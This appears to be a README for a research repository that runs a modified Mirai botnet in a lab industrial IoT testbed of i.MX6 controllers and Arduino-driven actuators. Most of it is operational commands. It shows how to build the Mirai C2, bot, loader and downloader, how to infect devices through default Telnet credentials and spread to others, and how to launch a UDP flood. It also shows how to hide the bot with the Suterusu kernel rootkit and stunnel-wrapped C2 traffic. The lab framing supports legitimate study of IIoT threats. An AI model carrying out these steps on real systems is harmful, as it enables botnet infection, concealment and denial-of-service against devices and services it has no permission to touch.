# Mirai4IIoT

*This is repository for the Mirai in IIoT scenario*.

### System structure diagram
The Control-Center and two Controllers (i.MX6) are connected to the Local Area Network (LAN).   
Each of controllers is controlling a servo motor actuator through an Arduino device.  

<div style="text-align: center">
<img src="mirai4iiot_demo.svg" width="80%" hight="80%" />
</div>

### Hardware and software environment
| No. |      Name      |        Hardware        |        CPU        |         Arch        |            OS            |
|:---:|:--------------:|:----------------------:|:-----------------:|:-------------------:|:------------------------:|
|  1  | Control-Center |         Laptop         |   Intel Core i7   |         x64         |        Windows 10        |
|  2  |  Mirai-Server  |     Virtual Machine    |   Intel Core i7   |         x64         |       Ubuntu 16.04       |
|  3  |  Controller    |   i.MX6SX SABRE Board  |  NXP i.MX 6SoloX  |  Cortex-A9 (ARMv7)  |       Linux 4.9.11       |
|  4  | Sub-Controller |    Arduino Uno Rev3    |     ATmega328P    |          -          |             -            |

### Files in the Repo
Compile with reference to the *Makefile* in the relevant folders. 
- `actuator/`: Run in i.MX6 for sending commands to Arduino.
- `arduino/`: Run in Arduino for controling Actuators.
- `mirai/`: Modified Mirai for IIoT. 
- `stunnel/`: Run in i.MX6 for hiding Telnet traffic. 
- `suterusu/`: Run in i.MX6 for hiding information of Mirai. 

### Non-stealthy Mirai attack processes 
- Load Mirai to controller-1 (192.168.1.9)
- Scan and report controller-2 (192.168.1.10)
- Load Mirai to controller-2 (192.168.1.10)
- Bots report device information
- Bots attack actuators
- Bots attack victim server (192.168.1.11)

### Stealthy Mirai attack 
- Use *Suterusu* to hide information including running processes and network ports. 
- Use *Stunnel* to hide information including network traffics. 
<div style="text-align: center">
<img src="mirai4iiot_stealthy.jpg" width="80%" hight="80%" />
</div>

### Build and Run
#### For `actuator`
```sh
# cd actuator\
# make
```
Copy the two executable files `servo_daemon` and `servo_set` to i.MX6. Run `servo_daemon` as a daemon process then use `servo_set` to control the actuator. Example:
```sh
# ./servo_daemon
# ./servo_set 20
```

#### For `arduino`
Open the `arduino_servo.ino` project with Arduino IDE and download it to the Arduino board. 

#### For `mirai`
There are 3 versions of Mirai: *non-stealthy (attack-actuator/ddos-only)* and *stealthy*. The building methods for them are the same.
Mirai uses `C` and `Go` as the programming language, and `mysql` as the database. Install the appropriate packages to setup the environment: 
```sh
# apt-get install electric-fence mysql-server mysql-client
Install the Go language:
    - Download the package: go1.9.3.linux-amd64.tar.gz
    - Unpack the package to /usr/local by:
        # tar -C /usr/local -xzf go1.9.3.linux-amd64.tar.gz
    - Add /usr/local/go/bin to PATH:
        # export PATH=$PATH:/usr/local/go/bin

```

Configure the cross-compile environment:  
``` sh
# mkdir cross-compile-bin
# cd cross-compile-bin
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
# wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
# cd ../scripts
# ./cross-compile.sh
```
Skip the installation of mysql during the compile. Edit the `.bashrc` file to add the paths and set the Go environment:   
```sh
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export GOPATH=$HOME/go
```
Compile `cnc`, `bot`, `loader`, `dlr`:   
```sh
# cd mirai/
# ./build.sh debug (or release) telnet
# cd ../loader
# ./build.sh
# cd ../dlr
# ./build.sh
```
Setup `tftp` environment on the Mirai server:
```sh
# apt-get install tftp-hpa tftpd-hpa xinetd
# vi /etc/default/tftpd-hpa (with the following contents)
TFTP_USERNAME="yourusername"
TFTP_DIRECTORY="yourfolder/tftp"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="-l -c -s"
(Copy mirai.arm7 to yourfolder/tftp/)
``` 

#### For `stunnel`
Compile `openssl`:  
```sh
# ./Configure linux-generic32 -–prefix=(yourfolder)/openssl.install
# vi Makefile (注释CROSS_COMPILE和CC)
# make
# make install
```
Compile `stunnel`:   
```sh
# ./configure –-host=arm-poky-linux-gnueabi –-with-ssl=(yourfolder)/openssl.install
# vi Makefile (Delete -fstack-protector)
# vi src/Makefile (Delete -fstack-protector)
# make 
```
Copy these files to i.MX6:  
```sh
# cp (yourfolder)/stunnel-5.48/src/stunnel /usr/bin
# cp (yourfolder)/stunnel-5.48/tools/stunnel.conf /usr/local/stunnel/
# cp (yourfolder)/openssl.install/lib/libssl.so.1.1 /usr/lib
# cp (yourfolder)/openssl.install/lib/libcrypto.so.1.1 /usr/lib
```
Install `stunnel` on Mirai server:   
```sh
# apt-get install stunnel
# cd /etc/stunnel/ 
# openssl genrsa -out key.pem 2048 
# openssl req -new -x509 -key key.pem -out cert.pem -days 1095
# cat key.pem cert.pem >> /etc/stunnel/stunnel.pem
```
Copy `stunnel.pem` to i.MX6 folder:   
```sh
/usr/local/etc/stunnel/stunnel.pem
```
Edit the configuration file `/usr/local/etc/stunnel/stunnel.conf` on i.MX6:   
```sh
[telnet]
client = yes
accept  = 6767
connect = 192.168.1.14:443
cert = /usr/local/etc/stunnel/stunnel.pem
```
Edit the configuration file `/etc/stunnel/stunnel.conf` on the Mirai server:  
```sh
[telnet]
client = no
accept  = 192.168.1.14:443
connect = 127.0.0.1:23
cert = /etc/stunnel/stunnel.pem
```

#### For `suterusu`:
Compile the rootkit:  
```sh
# make android-arm
# cd tool\
# make
```
Copy `suterusu.ko`, `tool\hide` and `tool\unhide` to i.MX6 and run:
```sh
# insmod suterusu.ko
# ./hide file (filename)
# ./unhide file (filename)
# ./hide pid (pid)
# ./unhide pid (pid)
```

### Example of Non-stealthy Mirai attack:
(1)	Compromise the device through vulnerable network services   
```sh
(on Mirai Server)
# ./non-stealthy/cnc
# tenlet cnc.test.com (mirai-user|mirai-pass)
```
(2)	Download malicious files to the device   
```sh
(on i.MX6 device)
# telnetd
(on Mirai Server)
# ./non-stealthy/loader
Input this information: 192.168.1.9:23 root:123456 arm7
```
(3)	Run malicious software in the device   
```sh
(on i.MX6 device)
# ps -aux | tail
```
(4)	Spread and infect other devices   
```sh
(on Mirai Server)
# ./non-stealthy/scanListen
You will get this information of another device: 192.168.1.10:23 root:123456 arm7
Input the information above on the loader to infect the other i.MX6. 
```
(5)	Lanch DDoS attack
```sh
(on Mirai Server)
# botcount
# udp 192.168.1.11 10
(on Control-Center)
Run Wireshark to check the UDP floods.  
ip.dst==192.168.1.11 and udp
```

### Example of Stealthy Mirai attack:  
(1)	Compromise the device by kernel rootkit
```sh
(on i.MX6 device)
# insmod suterusu.ko
```
(2)	Hide network traffics by stunnel
```sh
(on i.MX6 device)
# stunnel
(on Mirai Server)
# stunnel
```
(3)	Run stealthy-mirai in the device
```sh
(on Mirai Server)
# ./stealthy/cnc
# tenlet cnc.test.com (mirai-user|mirai-pass)
(on i.MX6 device)
# ./mirai.arm7-stealthy telnet:arm7
(on Mirai Server)
# botcount
# wireshark (ip.src==192.168.1.9 and ip.dst==192.168.1.14)
```
(4)	Hide running process of mirai
```sh
(on i.MX6 device)
# ./hide pid xxx
# ps -aux | tail
```
(5)	Hide network connections of mirai
```sh
(on i.MX6 device)
# ./hide port_tcpv4 6767
# netstat -an | grep :6767
```

-------------------------------------------------------




